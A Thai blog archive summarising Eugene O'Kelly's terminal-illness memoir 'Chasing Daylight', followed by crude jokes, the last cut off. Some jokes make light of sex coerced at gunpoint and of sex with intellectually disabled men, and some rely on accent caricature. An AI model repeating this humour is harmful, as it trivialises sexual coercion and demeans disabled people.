6/14/2556

สิ่งที่ต้องทำก่อนตาย ความตายที่ดีที่สุด

เขาอายุเพียง ๕๓, เป็นผู้บริหารสูงสุดของบริษัทตรวจบัญชียักษ์ “KPMG” ของสหรัฐฯ ได้รับเงินเดือนอันดับต้น ๆ ของสุดยอดนักบริหารมะกัน, กำลังอยู่จุดสูงสุดของอาชีพ......กำลังเตรียมเดินทางรอบโลก เตรียมไปร่วมงานวันแรกของลูกสาวขึ้นเรียนชั้นมัธยม ทุกอย่างกำลังเป็นไปอย่างเฟื่องฟูและวันดีคืนดี หมอก็ตรวจพบว่านาย “ยูจีน โอ’เคลลี่” (Eugene O’Kelly) มีมะเร็งในสมองและอยู่ในขั้นสุดท้ายเสียด้วย

หมอบอกว่าเขาจะมีชีวิตอยู่ได้อีกไม่เกิน ๓ ถึง ๖ เดือน ไม่ต่างอะไรกับสวรรค์อับปางลงต่อหน้าต่อตา ความฝันทุกอย่างที่มีสำหรับตัวเองและครอบครัว พังสลายลงมาฉับพลัน ยูจีนตัดสินใจว่าเขาจะไม่ยอมนอนรอวันตาย เขาตัดสินใจปรับแผนชีวิตเพื่อให้ไม่กี่สิบวันของชีวิตที่เหลือมีความหมายที่สุด

ผมรู้จักเขาจากหนังสือ “Chasing Daylight” (“ไล่ล่าแสงตะวัน”) ที่ออกขายมาในอเมริการะยะหนึ่งแล้ว เป็นหนังสื่อที่เขาเล่าชีวิตวันต่อวันจนถึงวันสุดท้าย โดยมีบทส่งท้ายเขียนโดยภรรยาที่ชื่อ “คอรีนน์" ซึ่งเป็นทั้งเงาประจำตัวและเป็นพยาบาลตลอด ๒๔ ชั่วโมง ที่เล่าถึงนาทีสุดท้ายของชีวิตของสามี เรื่องราวน่าทึ่งของนักธุรกิจใหญ่ที่ต้องเผชิญกับ “กำหนดตารางวันตาย” นี้เป็นการบันทึก “การเดินทางวาระสุดท้าย” อย่างกล้าหาญและเด็ดเดี่ยว

ภายใต้ชื่อหนังสือนั้น, คนเขียนอธิบายว่ามันคือเรื่องราวส่วนตัวที่เล่าขานอย่างละเอียดละออว่า
“ความตายที่กำลังจะมาถึงไปปรับเปลี่ยนชีวิตของข้าพเจ้าอย่างไรบ้าง”
ทันทีที่หมอบอกว่าผมจะมีชีวิตอยู่อีก ๓ ถึง ๖ เดือน ผมก็ถามตัวเองว่า “ทำไมช่วงสุดท้ายของชีวิตคนเราจะต้องเป็นช่วงที่เลวร้ายที่สุด?”

เขาบอกตัวเองว่าเขาจะทำให้วันเวลาช่วงสุดท้ายก่อนตายนั้นเป็น
“ประสบการณ์ทางสร้างสรรค์ที่ควรจะเป็นช่วงที่ดีที่สุดของชีวิต” ให้ได้
เมื่อมีเวลาไตร่ตรองและพูดคุยกับตัวเองเพียงพอ
ยูจีนก็บอกว่าถือว่าเป็น “โชคดี” ที่เขารู้ล่วงหน้าว่าจะตาย
เพราะคนจำนวนไม่น้อยที่ไม่มีเวลาคิดถึงความตายของตัวเองก่อนด้วยซ้ำ เพราะมันมาอย่างรวดเร็ว กระทันหันและเจ้าตัวตั้งตัวไม่ทันด้วยซ้ำไป

หมอบอกเขาว่ามะเร็งในสมองของเขาส่วนนั้นจะไม่ทำให้มีอาการเจ็บปวดมากนัก ความเสื่อมของสมองมาค่อย ๆ มาในรูปของเงามืด สายตาจะพร่ามัว และเมื่อถึงเวลาอาการก็จะทรุดเข้าสู่โคม่า ความมืดของกลางคืนจะมาถึง และเขาก็จะตาย
เขานับนิ้วแล้วว่าจะเหลือชีวิตเพียง ๑๐๐ วัน
เขาย้อนมองชีวิตการทำงานเขาแล้วก็ปลงว่าเขาไม่เคยมีเวลาให้กับครอบครัว, ไม่ค่อยได้กลับบ้านกินข้าวเย็นกับภรรยาและลูก,
แม้ลูกจะอ้อนว้อนขอร้องให้เขาไปร่วมงานโรงเรียนของลูก
เพราะพ่อแม่ของเพื่อนๆ ต่างก็ไปร่วมทั้งนั้น
เขากลับอ้างว่ามีนัดหมายเรื่องงานการ
ที่ไม่อาจจะไปเป็นเพื่อนของลูกได้

ยูจีนนั่งเสียใจว่าเขาใช้ชีวิตอย่าง
“นักธุรกิจที่ไม่เคยมีเวลาให้กับครอบครัว”
ทั้งๆ ที่เขาอ้างว่าที่เขาทำงานหามรุ่งหามค่ำ
ต่อสู้เรียกร้องเพื่อให้ได้ตำแหน่งสูงขึ้น
และได้รายได้เพิ่มพูนขึ้นนั้น
ก็เพราะเขารักครอบครัว

“ในฐานะซีอีโอของบริษัทใหญ่ที่มีพนักงานถึง ๒๐,๐๐๐ คน, ผมมีสิทธิ์พิเศษมากมาย แต่งานในตำแหน่งนั้นก็กดดันให้ผมต้องทำงานอย่างบ้าเลือด ปฏิทินงานการของผมกำหนดไว้ ๑๘ เดือนล่วงหน้า ผมเคลื่อนไหวด้วยความเร็ว ๑๐๐ ไมล์ต่อชั่วโมงตลอดเวลา,
ผมทำงานตลอดเวลา, แม้วันสุดสัปดาห์ก็ไม่ได้เว้น,
กลางดึกกลางดื่นผมก็ยังทำงาน,
ผมไม่เคยได้ไปงานโรงเรียนของลูกสาวคนเล็กของผมเลย สิบปีแรกหลังการแต่งงาน ผมไม่เคยไปพักร้อนกับภรรยาเลย...”

แต่เขารู้วันที่เขามีชีวิตเหลือไม่กี่เดือนว่านั่นเป็นข้ออ้างที่เขาไม่มีโอกาสได้แก้ตัวอีก
ยูจีนตัดสินใจว่าเขาจะทำให้การจากโลกของเขา
เป็น “ความตายที่ดีที่สุด” เท่าที่จะทำได้
เขาเรียกมันว่า “the best possible death”

เขานั่งลงเขียน “สิ่งที่ต้องทำก่อนตาย” อย่างนี้
๑. จัดแจงเรื่องกฎหมายและการเงินของตัวเองให้ครอบครัวให้เรียบร้อย
๒. “ร่ำลา” ครอบครัว, เพื่อนสนิท, และเพื่อนร่วมงาน
๓. ทำให้ทุกอย่างที่เหลือของชีวิตเป็นเรื่อง “ง่ายๆ และสบาย ๆ”
๔. อยู่กับปัจจุบันทุกนาที
๕. สร้างและเปิดอารมณ์ให้รับ “นาทีอันสมบูรณ์” (“perfect moments”) ตลอดเวลาจนถึงลมหายใจสุดท้า
๖. เริ่มต้นกระบวนการ “ผ่องถ่าย” ไปสู่ภาวะถัดไป
๗. เตรียมงานศพของตัวเอง

น่าแปลกว่า สำหรับคนที่ต้องรับการรักษาที่ทำให้ร่างกายต้องผ่ายผอมและสมองทำงานช้าลงไปเรื่อยๆ นั้น,
ยูจีนสามารถทำตามตารางที่วางไว้ให้กับตัวเองเกือบทั้งหมดทุกวัน, เขาจะนั่งลงเขียนหนังสือเล่มนี้ด้วยปากกา
เพราะสมองไม่พร้อมจะให้ใช้นิ้วพิมพ์คอมพิวเตอร์ได้
และลายมือก็เริ่มจะเฉๆ ไฉๆ ไม่เป็นตัวหนังสือแล้ว
แต่เขาก็มีความอดทนและมุ่งมั่นเขียนจนถึงอีกไม่กี่วันก่อนที่จะจากไปโดยมีภรรยาของเขาเป็น “ผู้เขียนร่วม”
เพื่อปิดฉากชีวิตด้วยหนังสือที่เขาเชื่อว่าจะเป็นประโยชน์สำหรับคนที่ไม่เคยคิดว่าวันหนึ่งชีวิตอันยุ่งเหยิงและวุ่นวายกับการ “สร้างเนื้อสร้างตัว”
หรือ “สร้างความมั่งคั่งให้กับตัวเองและครอบครัว” นั้น
จะต้องปิดฉากลงอย่างฉับพลันอย่างนั้น

ยูจีนร่ำลาเพื่อนฝูงด้วยการเขียนจดหมายไปขอบคุณเขาที่ได้เป็นเพื่อนอันแสนดีหรือเพื่อนร่วมกันที่น่ารัก....และบอกด้วยว่า เขากำลังจะจากโลกนี้ไปในเร็ววัน ขอให้เพื่อนได้รับความขอบคุณจากเขาด้วย
หนึ่งในหลายร้อยฉบับที่เขาเขียนอำลาเพื่อนนั้นมีสั้นๆ อย่างนี้

“ดั๊กเพื่อนรัก...
เพื่อนคงได้ยินข่าวแล้ว, สุขภาพฉันย่ำแย่ลงเรื่อยๆ เพราะเจ้ามะเร็งสมองระยะสุดท้าย ที่ฉันเขียนจดหมายฉบับนี้มาก็เพื่อจะบอกเพื่อนว่ามิตรภาพของเราตั้งแต่เราเรียนที่ Penn State ด้วยกันนั้นมีความหมายต่อชีวิตฉันอย่างมากทีเดียว
ขอให้เพื่อนโชคดีในชีวิต ขอให้พระเจ้าคุ้มครองเพื่อนด้วย
ยูจีน...”

เขานั่งลงกับลูกทีละคนเพื่อ “พูดจาสั่งลา” กันอย่างสนิทสนม
อยากคุยเรื่องอะไรก็ได้ทั้งนั้น ไม่ว่าจะเป็นเรื่องอดีต,หรือสิ่ง ที่เคยทำด้วยกันหรือประสบการณ์อันน่าประทับใจที่เคยใช้ชีวิตร่วมกัน ไม่จำเป็นต้องเป็นการแสดงความอาลัยอาวรณ์,
ไม่จำเป็นต้องเป็นการพูดคุยกันอย่างเป็น “สาระ” เกินไป.
.จะคุยอะไรก็ได้ระหว่างพ่อกับลูก, ลูกกับพ่อ, ผัวกับเมีย, เมียกับผัว...หัวเราะต่อกระซิก, กระเซ้าเย้าแหย่กันได้ก็ยิ่งดี
และสิ่งที่ยูจีนค้นพบที่สำคัญที่สุดก่อนหมดลมหายใจก็คือความสำคัญของการ “อยู่กับปัจจุบัน” หรือ here and now
เพราะตลอดชีวิตของการทำงานนั้น,เขาไม่เคยอยู่กับตัวเอง, ไม่เคยอยู่กับปัจจุบันเลย...มีแต่อดีตกับอนาคต
เมื่อเขารู้ว่าเหลือชีวิตเหลือเพียงแค่ประมาณ ๑๐๐ วัน,
เขาจึงรู้ว่าการ “อยู่กับปัจจุบัน” นั้นมีความหมายอันลึกซึ้งเพียงใด

6/08/2556

ไม่เต็มบาท

มีผู้หญิงอยู่คนหนึ่งกำลังขับรถจะออกไปต่างจว. รถดันเสียระหว่างทางและในบริเวณที่รถเสียก็ดันเป็นทะเลทรายซึ่งดูแล้วก็มีบ้านคนอยู่แค่หลังเดียวแถวนั้น
ผู้หญิงจึงเดินไปที่บ้านหลังนั้นเพื่อขอร้องให้เจ้าของบ้านช่วย 
เจ้าของบ้านซึ่งเป็นผู้ชายมีอายุอาศัยอยู่กับลูกชายสามคนก็ได้ช่วยซ่อมรถให้ 
และก็ได้บอกกับผู้หญิงว่าต้องนอนค้างที่บ้านของเขาเพราะรถนั้นจะเสร็จก็พรุ่งนี้ 
เจ้าของบ้านให้ผู้หญิงนอนห้องตรงข้ามกับห้องลูกชายและบอกกับผู้หญิงว่าห้ามเข้าไปทำอะไรลูกชายเพราะลูกชายทั้งสามคนของเขานั้นเอ๋อ..(ไม่เต็มบาท)

ตกดึกผู้หญิงเกิดมีอารมณ์ขึ้นมา จึงเดินไปเข้าห้องลูกชายคนแรก
และก่อนที่จะมีอะไรกันผู้หญิงก็บอกกับผู้ชายว่า "ต้องใส่ถุงยางนะ ถ้าไม่ใส่ฉันจะท้อง"
คนแรกจึงทำตาม ต่อมาก็เข้าห้องคนที่สองและสามและก็บอกเหมือนกันทั้งสามคน
หลังจาก 20 ปี ผ่านไปชายสามคนเริ่มมีอายุมากขึ้น
ทุกคนก็นั่งกันอยู่หน้าบ้านคนแรกนึกขึ้นมาได้จึงเอ่ยขึ้นว่า
"เฮ้..จำผู้หญิงที่เคยมาพักที่บ้านเราเมื่อ 20 ปี ทีแล้วได้ไหม?"
คนที่สองตอบ "อ้อ..จำใด้"
และคนแรกจึงถามอีกว่า "นายคิดว่าป่านนี้เขาจะท้องไหม?"
คนที่สามจึงตอบว่า "คงไม่ท้องแล้วมั้ง"

คนแรกตอบ "ถ้างั้นเราก็น่าจะถอดถุงยางออกได้แล้วมั้ง" 

อาแปะ กับ โจรสลัด

กาลครั้งหนึ่ง..มีอาแปะคนหนึ่งล่องเรือสำเภาค้าขายไปทั่ว 
ไม่ว่าจะเป็นหัวเมืองน้อยใหญ่ที่อยู่ชายทะเล 
วันหนึ่งอาแปะล่องเรือเห็นเกาะ ๆ หนึ่งน่าสนใจ 
คิดว่าวันนี้วันนี้เราขายของเราได้อีกแล้ว จึงเอาเรือของเขาเทียบที่เกาะ ๆ นั้น 
อาแปะหารู้ไม่ว่าเกาะนั้นเป็นเกาะของโจรสลัดที่ชอบเที่ยวออกปล้นสดมภ์
เป็นคราวเคราะร้ายของอาแปะซะแล้ว 
เมื่ออาแปะเอาเรือสำเภาเทียบท่า 
โจรสลัดก็กรูกันลงมายึดเรือของอาแปะทันทีและจับตัวอาแปะไว้เพื่อที่จะนำไปให้หัวหน้าโจรสลัด

เมื่ออาแปะถูกนำตัวไปถึงหัวหน้าโจรสลัด
หัวหน้าโจรสลัดเห็นอาแปะแต่งตัวดูภูมิฐาน ใส่เสือ Vercase คาดนาฬิกา Rolex รองเท้า Timberland
ก็เกิดอยากได้จึงเอ่ยปากขอกับอาแปะว่า.....

โจรสลัด : แปะ..อั๊วอยากได้นาฬิกาลื้อ..
อาแปะ : อั๊ว..ไม่ให้
โจรสลัด : ลื้อไม่ให้..อั๊วยิง..
อนิจจา..อาแปะเลยต้องให้นาฬิกาไป เท่านั้นยังไม่พอ
โจรสลัด : อาแปะ...อั๊วอยากได้รองเท้าลื้อ..
อาแปะ : อั๊ว..ไม่ให้
โจรสลัด : ลื้อไม่ให้..อั๊วยิง..
อาแปะเลยต้องให้รองเท้า Timberland แสนรักให้กับโจรสลัดไป
โจรสลัด : อาแปะ...อั๊วอยากได้เสื้อผ้าลื้อ..
อาแปะ : อั๊ว..ไม่ให้
โจรสลัด : ลื้อไม่ให้..อั๊วยิง..
อาแปะเลยต้องให้เสื้อผ้าไป ....ปกติอาแปะเป็นคนไม่ชอบใส่กางเกงในเมื่อถูกถอดเสื้อผ้าแล้วแปะก็เหลือแต่แปะน้อย
โจรจึงคิดอุบายแกล้งอาแปะผู้น่าสงสารต่อ...โจรสลัด : อาแปะ จัดการถั่วดำลูกน้องข้าที่มันเป็นเกย์เดี๋ยวนี้
อาแปะ : อั๊ว..ไม่ทำ
โจรสลัด : ลื้อไม่ทำ กูยิง

อาแปะจึงจำใจกระทำโดยที่ไม่เต็มใจซักเท่าไหร่
เวลาผ่านไปได้สักครู่
หัวหน้าโจรสลัดจึงพูดขึ้นว่า
โจรสลัด : แปะหยุดทำ...ไม่หยุดมุงตาย

อาแปะ : แฮ่ก แฮ่ก ๆ... อั๊วยอมตายยยยย

สัตว์เลี้ยง

คุณครูคุยกับเด็กนักเรียนอนุบาล 1 ระหว่างคอยผู้ปกครองมารับกลับบ้าน 
"ที่บ้านหนูเลี้ยงสัตว์อะไรบ้างคะ" คุณครูถาม 
"มีหมาแค่ตัวเดียวค่ะ แต่ข้างบ้านเขาเลี้ยงตั้งหลายอย่างค่ะ 
มีนก แมวชะนีก็มีค่ะ" หนูน้อยเล่า 
"แล้วหนูชอบอะไรมากที่สุดคะ" ! 
"ชอบนกกับปลาสวยๆ คะ" 

"เหรอคะ แล้วคุณพ่อคุณแม่ละคะชอบอะไร" ครูถามต่อ 
"คุณพ่อชอบอ่านหนังสือ ไม่ชอบสัตว์อะไรซักอย่าง.."หนูน้อยส่ายหน้าเมื่อพูดถึงคุณพ่อ"

ส่วนคุณแม่..เห็นคุณพ่อพูดอยู่เรื่อยเลยว่าคุณแม่ชอบแรดค่ะ.."

มีทุกเมนู

ก้องไปร้านอาหารร้านหนึ่ง หลังจากนั่งลงบริกรก็เดินมารับออร์เดอร์

"ขอเมนูหน่อยครับ" ก้องบอกบริกร "ไม่จำเป็นต้องใช้หรอกครับ

ร้านเรามีรายการอาหารทุกเมนูครับ ท่านอยากสั่งอะไรก็ว่ามาเลยครับ"

บริกรตอบ "อ้าว ถ้าไม่มีเมนูมาให้ดู แล้วจะรู้ได้ยังล่ะไงว่าร้านนี้

จะมีรายการอาหารที่ผมอยากลองหรือเปล่าน่ะ" ก้องสงสัย

"ไม่เป็นไรครับ ร้านของเรามีทุกอย่าง ทุกเมนู คุณสั่งมาได้เลยครับ"

บริกรอวด"วะ อะไร มันจะเป็นไปได้ไง งั้นผมสั่งแซนด์วิชไส้เนื้อจระเข้อ่ะ"

ก้องแขวะให้ "ได้ครับ รอสักครู่นะครับ" พนักงานรับออร์เดอร์แล้วหายไปพักหนึ่ง

ทิ้งให้ก้องงง ๆ อยู่ตรงนั้น สักพักพนักงานก็วิ่งกระหืดกระหอบมา

"ขอโทษนะครับ เมนูนี้เราไม่สามารถจัดให้ได้" บริกรบอกก้อง

"ไหนว่ามีทุกเมนูไงวะ" ก้องแขวะให้อีกที

"คือ... มีทุกเมนูจริงนะครับ แต่ว่า วันนี้ ขนมปังเราหมดร้านแล้วครับ"

ละลายในปาก ไม่ละลายในมือ

กาลครั้งหนึ่งไม่นานเท่าไหร่หรอก หญิงนางหนึ่งถูกสาปไว้

ถ้าจับสิ่งใดขอให้หลอมละลายกลายเป็นไอน้ำ
พระราชาเป็นห่วงบุตรีหาวิธีแก้ไขอย่างไรก็มิหาย หมดหนทางที่จะช่วยบุตรี
แต่จู่ ๆ ก็มีนางฟ้ามาปรากฏกายขึ้นและก็จะถอนคำสาปให้หายโดยพลัน
แต่นางมีข้อแม้อย่างหนึ่งว่าจะต้องมีชายคนหนึ่งหาสิ่งใดก็ได้มาให้บุตรีจับ
แล้วไม่ละลาย คำสาปนั้นจึงจะหายไป
พระราชาไม่รอช้ามุ่งหน้าป่าวประกาศโดยพลัน
หากชายใดสามารถถอนคำสาปได้ใน 1 วัน
ฉันจะยกลูกสาวให้เจ้าไป

จนสามารถคัดเลือกเหลือ 3 คน

คนที่หนึ่งจึงเริ่มเอาของดีมาแก้ไข
หยิบโครตเพชรเม็ดงามให้ ทรามวัย
เจ้าหญิงจึงยื่นมือไปแล้วแตะในทันที
ยังไม่ทันจะแตะได้เต็ม
มือ เพชรก็หายละลายไปสิ้น
ฉันเสียใจด้วยจริงๆ
เพชรเม็ดนี้ต้องละลายไป
เจ้าหญิงกล่าว

ชายคนที่สองรองถัดมา
ก็เดินมาเบื้องหน้าของเจ้าหญิง
ยื่นเหล็กแหลมแข็งแกร่งไม่อ่อนนิ่ม
ให้เจ้าหญิงลองจับสัมผัสดู

แต่แล้วมันก็ละลายหายไปหมด
เธอก็อด ตกรอบไปเสียสิ้น

คนสุดท้ายเดินมาตัวปล่าวไม่มีทรัพย์สิน
บอกเจ้าหญิงจงเอามือล้วงลงไปในกางเกง
เจ้าหญิงจึงล้วงลงไปในกางเกงของชายผู้นั้น
หน้าเจ้าหญิงก็เริ่มแดง ด้วยความเขินอาย
แล้วจึงรีบดึงมือออกโดยพลัน หันมาบอกราชา
เสด็จพ่อเพคะ ...มัน....
มัน..มันยังแข็งอยู่เลยค่ะ
ในที่สุดชายคนที่ 3 ก็ได้เป็นผู้ชนะไป
พระราชาสงสัย มันคืออะไร
อยู่ในกางเกงของชายผู้นั้น .....?

ชายคนที่ 3 ไม่ยอมตอบ ได่แต่อมยิ้ม
และก็ได้ล้วงเข้าไปในกางเกงของเขา
แล้วหยิบมันออกมา

มันคือ

m&m
ช็อคโกแลต ละลายในปาก ไม่ละลายในมือ

บัวหิมะพันปี

นักโทษ 3 คน กำลังจะถูกนำตัวไปประหารชีวิต เจ้าหน้าที่ จึงถามตามธรรมเนียมว่า ก่อนตายอยากกินอะไรเป็นมื้อสุดท้าย
"ผมอยากกินพิซซ่า" คนแรกตอบ
เขาได้กินพิซซ่าถาดใหญ่พิเศษ และถูกนำตัวไปประหาร
"ผมอยากกินไก่ทอดเคเอฟซี" คนที่สองตอบ
เขาได้กินไก่ทอดเคเอฟซี แล้วก็ถูกนำตัวไปประหาร
"ผมอยากกินบัวหิมะพันปี" คนที่สามตอบ
"แต่นี่ยังไม่ถึงเวลาบัวหิมะพันปีออกเลยนะ" เจ้าหน้าที่บอก
นักโทษแสยะยิ้มแล้วพูดอย่างหน้าตาเฉย
"ไม่เป็นไรครับ ผมรอได้"

ม้าร้องไห้

มีมหาเศรษฐีอยู่คนหนึ่ง มีเงินมากมาย แต่งกมาก
อยู่มาวันหนึ่งนึกเซ็งๆ ไม่รู้จะทำอะไรให้มันสนุก ก็หาเกมส์มาให้เล่นกันว่า
ถ้าใครสามารถทำให้ม้าหัวเราะได้ เราจะให้เงิน 1000 ตำลึง
หากม้าไม่หัวเราะจะต้องเสียทอง 20 ตำลึงให้แก่เศรษฐี
ก็มีผู้คนมาสมัครมากมาย แต่ก็ต้องเสียเงิน 20 ตำลึงให้แก่เศรษฐี
ทำให้เศรษฐีร่ำรวยขึ้นอีก

อยู่มาวันหนึ่ง มีเงาะป่ามารับคำท้าเศรษฐี เงาะป่าเพียงแต่ไปกระซิบที่ข้างหูม้า ม้าก็หัวเราะร้อง ฮี้ ๆๆๆ
ผู้คนที่มาดูต่างตบมือในความสามารถ และก็สงสัยว่าม้าทำไมจึงหัวเราะ
ฝ่ายเศรษฐีก็เหงื่อตกที่ต้องสูญเสียเงิน 1000 ตำลึงให้แก่เจ้าเงาะป่าไป
จึงออกอุบายไปว่า "เจ้าเงาะป่า ถ้าเจ้าสามารถทำให้ม้าร้องให้ได้ ข้าจะให้เงินเจ้าอีก 1000 ตำลึง
หากเจ้าทำไม่ได้ เจ้าจะต้องคืนเงิน 1000 ตำลึงให้แก่ข้า"
เงาะป่าก็รับคำท้า แค่เดินไปใกล้ๆ ม้า สักครู่เดียว ม้าตัวนั้นก็ร้องไห้ออกมา
เศรษฐีเห็นดังนั้นก็แทบเป็นลม จำเป็นต้องจ่ายเงินอีก 1000 ตำลึงให้แก่เจ้าเงาะป่า
แล้วถามว่าเจ้าทำยังไง จึงสามารถทำให้ม้าหัวเราะและร้องไห้ได้
เงาะป่ารู้ว่าเศรษฐีเป็นคนงก ก็อยากจะดัดนิสัย
ก็บอกว่าถ้าจะให้เฉลยต้องจ่ายมาอีก 100 ตำลึง ไม่งั้นไม่เฉลย
เศรษฐีก็ยอมจ่าย เงาะป่าก็บอกว่า ทำให้ม้าหัวเราะ
ก็แค่บอกว่า " ของข้าใหญ่กว่าของเจ้า" ม้าได้ฟังก็หัวเราะ
เพราะนึกว่าของมันเองใหญ่กว่าใครอยู่แล้ว
เศรษฐีก็ถามว่า แล้วม้าร้องไห้ล่ะ

เงาะป่าก็ตอบว่า "ข้าก็เปิดให้เจ้าม้านั่นดูเท่านั้นเอง"

โซเดียมคลอไรด์

มีรายการแม่บ้านสมองไวรายการหนึ่ง ได้เชิญแม่บ้านมาตอบคำถามเพื่อชิงรางวัล เป็นคำถามเกี่ยวกับเคล็ดลับในครัวทั้งหลายแหล่ ครั้งหนึ่งทางรายการได้ตั้งคำถามให้แม่บ้านที่เชิญมาว่า "โซเดียมคลอไรด์เป็นชื่อวิทยาศาสตร์ของสารชนิดหนึ่งที่แม่บ้านจำเป็นต้องใช้ อยากทราบว่าแม่บ้านเรียกกันทั่วไปว่าอย่างไร?"
แม่บ้านทุกคนที่มาออกรายการต่างพากันงง เนื่องจากไม่ได้เรียนทางด้านวิทยาศาสตร์เลยไม่รู้ว่า คำตอบคือ เกลือแกงที่ใช้ปรุงรส ต่างก็ทำหน้างงๆๆ
พิธีกรก็เลยใบ้เพิ่มเติมว่า "ก็ที่แม่บ้านใส่ใข่ให้สามีทุกเช้านั่นแหละครับ"(พิธีกรหมายถึง ไข่ลวกที่ต้องมีการเติมเกลือ พริกไทย)
หลังจากใบ้เสร็จแม่บ้านท่านหนึ่งรีบกดกริ่งพร้อมกับตอบทันทีว่า
"แป้งเด็กจอห์นสันค่ะ"(ไข่ของใครก็ไม่รู้)

มีน้ำมะนาวไหม

A: มีน้ำมะนาวไหม
B: ร้านกรูขายไก่
A: มีน้ำมะนาวไหม
B: ร้านกรูขายไก่เว้ย !
A: มีน้ำมะนาวไหม
B: บอกขายไก่ถ้ามืงถามอีกทีเด่วกรูแทงเลย
A: มีมีดไหม
B: ไม่มี ถามทำไม !
A: มีน้ำมะนาวผสมน้ำอุ่นไหม
B: ???????

เซ็กซ์ที่ยอดเยี่ยม

ชายหนุ่มคนหนึ่งไม่รู้ว่าจะให้อะไรเป็นของขวัญวันเกิดภรรยาเพื่อให้เธอพอใจ 
เพื่อนแนะนำว่า แต่งงานกันมานานเธอคงอยากได้เซ็กซ์ที่ยอดเยี่ยมบ้าง 
ชายหนุ่มกลับมาบ้าน เขาแฮปปี้เบิร์ทเดย์ภรรยาและบอกว่า 
"ที่รัก วันเกิดปีนี้ ฉันจะให้เธอมีเซ็กซ์ที่ยอดเยี่ยมเวลาไหนก็ได้ เป็นเวลา 2 ชั่วโมง 
เพื่อเป็น ของขวัญ" 

ภรรยาได้ยินดังนั้น ก็โดดเข้ามาหอมแก้มเขาและวิ่งออกจากบ้านไป 
พร้อมกับตะโกนกลับมาว่า

"ขอบใจจ้ะ แล้วอีก 2 ชั่วโมงชั้นจะกลับมานะ!" 

หมอเก่งจัง

โจ กับ จิม ตัดไม้อยู่ในป่า บังเอิญเกิดอุบัติเหตุแขนของโจถูกขวานตัดขาด จิมรีบห่อแขนของเขาในถุงพลาสติกแล้วพาไปหาศัลยแพทย์ 
“คุณโชคยังดีนะเนี่ย ผมเป็นผู้เชี่ยวชาญด้านการต่ออวัยวะพอดี” หมอคุย “อีกสัก 5 ชั่วโมงค่อยกลับมานะ”
5 ชั่วโมงต่อมา จิมกลับมาที่โรงพยาบาล 
“ผมทำเสร็จเร็วกว่าที่บอกไว้นิดหน่อย เพื่อนคุณไปรอคุณอยู่ที่บาร์ข้างโรงพยาบาลน่ะ” หมอบอก 
จิมเดินเข้าไปในบาร์ เห็นโจกำลังงัดข้ออยู่กับไอ้หนุ่มร่างบึ้กคนหนึ่งอยู่

สองสามสัปดาห์ต่อมา พวกเขาออกไปตัดไม้กันอีก คราวนี้โจพลาดไปฟันถูกขาตัวเองขาดอีก จิมรีบห่อขาของเขาใส่ถุงพลาสติกแล้วพาไปหาหมอคนเดิม
เช่นเดียวกับครั้งแรก หมอบอก “สบายมาก ขอผมสัก 8 ชั่วโมงละกัน ขาต่อยากกว่าหน่อย”
จิมกลับมาในอีก 8 ชั่วโมงต่อมา
หมอบอก “ผมทำเสร็จเร็วตามเคย เพื่อนคุณเตะฟุตบอลอยู่ข้างล่างแน่ะ”
จิมลงไปที่สนามทันเห็นโจยิงประตูสุดสวยพอดี

หลายสัปดาห์ต่อมา จิมเกิดอุบัติเหตุบ้าง คราวนี้ร้ายแรงมาก หัวเขาขาด โจรีบเอาหัวเขาใส่ถูกพลาสติกแล้วไปหาหมอเทวดาเจ้าเก่า
“พระเจ้า” หมอตกใจ “ต่อหัวนี่ยากมากเลย อีกสัก 12 ชั่วโมงคุณค่อยกลับมานะ”
12 ชั่วโมงต่อมา โจกลับมาที่โรงพยาบาล
“ผมเสียใจด้วย” หมอพูดเสียงอ่อย “เพื่อนคุณตายแล้ว”
โจช็อก อึ้งไปสักพักแล้วพึมพัมออกมา “ผมเข้าใจครับ ต่อหัวมันไม่ได้ง่ายๆอยู่แล้ว”
“เดี๋ยวๆ คุณเข้าใจผิด” หมอท้วง “เขาขาดอากาศหายใจเพราะคุณเอาหัวใส่ถุงพลาสติกมาต่างหาก”

เวอร์ล่ะ

สมชายนั่งก๊งเหล้าอยู่คนเดียวด้วยท่าทางกลุ้มอกกลุ้มใจ เพื่อนเห็นอย่างนั้นก็เลยเข้าไปถาม 
"อั๊วแอบปิ๊งสาวคนนึงที่ออฟฟิซ" สมชายว่า "เย็นนี้เธอรับปากจะไปดินเนอร์กับอั๊วสองต่อสองน่ะ" 
"อ้าว... ก็ฟังดูดีนี่หว่า" เพื่อนว่า "ไม่เห็นมีอะไรน่ากลุ้มใจเลยนี่หว่า" 
"มันไม่ใช่แค่นั้นสิ" สมชายเล่าต่อ "อั๊วน่ะมีปัญหาอยู่อย่าง เวลาตื่นเต้นไอ้น้องชายมันจะลุกขึ้นมา ถ้าเธอเห็นเข้ามีหวังอั๊วไม่รู้เอาหน้าไปไว้ไหน แล้วเธอก็คงคิดว่าอั๊วเป็นพวกบ้ากามแน่เลย"
"โธ่เอ๊ย... ไม่เห็นจะยาก" เพื่อนแนะนำ "เอางี้นะ ลื้อก็จับน้องชายของลื้อมัดไว้กับขาซักข้าง เอาเทปพันไว้ให้แน่นๆ ทีนี้มันฮึดฮัดขึ้นมายังไงก็ไม่มีใครสังเกตเห็นหรอก"
สมชายรับไอเดียของเพื่อนไว้อย่างดีใจและตั้งใจว่าจะเอาไปลองทำดู

วันถัดมาเพื่อนมาเจอสมชายนั่งก๊งเหล้าอยู่คนเดียวตามเคย แถมดูกลุ้มหนักซะยิ่งกว่าเดิมด้วยซ้ำ
"อ้าว เฮ้ย..." เพื่อนถาม "ทำไมทำหน้าเศร้ายังงั้นล่ะ เกิดอะไรขึ้นเรอะ"
"เฮ้อ... ก็วิธีของลื้อน่ะสิ" สมชายรำพัน "อั๊วก็ทำตามที่ลื้อแนะนำทุกอย่าง พอไปถึงหน้าห้องเธอ อั๊วก็กดกริ่ง เธอก็มาเปิดประตูให้ พออั๊วเห็นหน้าเธอเท่านั้นแหละ อารามตื่นเต้น ขาที่มัดไว้กับน้องชายมันยกขึ้นมาเตะเธอเข้าให้เต็มรักเลยแหละ!!!"

เรียนไป ทำงานไป

A: คุณทำงานหรือเรียนอยู่ครับ???
B; อ้อ ทำงานไปด้วยเรียนไปด้วยค่ะ
A: ทำงานอะไรเหรอครับ??
B: เป็นประชาสัมพันธ์อยู่ที่ Big C ค่ะ
A; อ้อ แล้วเรียนอะไรอยู่เหรอครับ???
B; เรียนท่านผู้มีอุปการะคุณโปรดทราบ...
A: .....

พิมพ์ตก พิมพ์เกิน

อาจารย์ : หนูมีปัญหาอะไร
นศ. : คือว่า..ที่บอร์ดประกาศผลของมหาลัยฯ นะค่ะ
อ. : ทำไมหรือ บอร์ดมีปัญหาอะไร
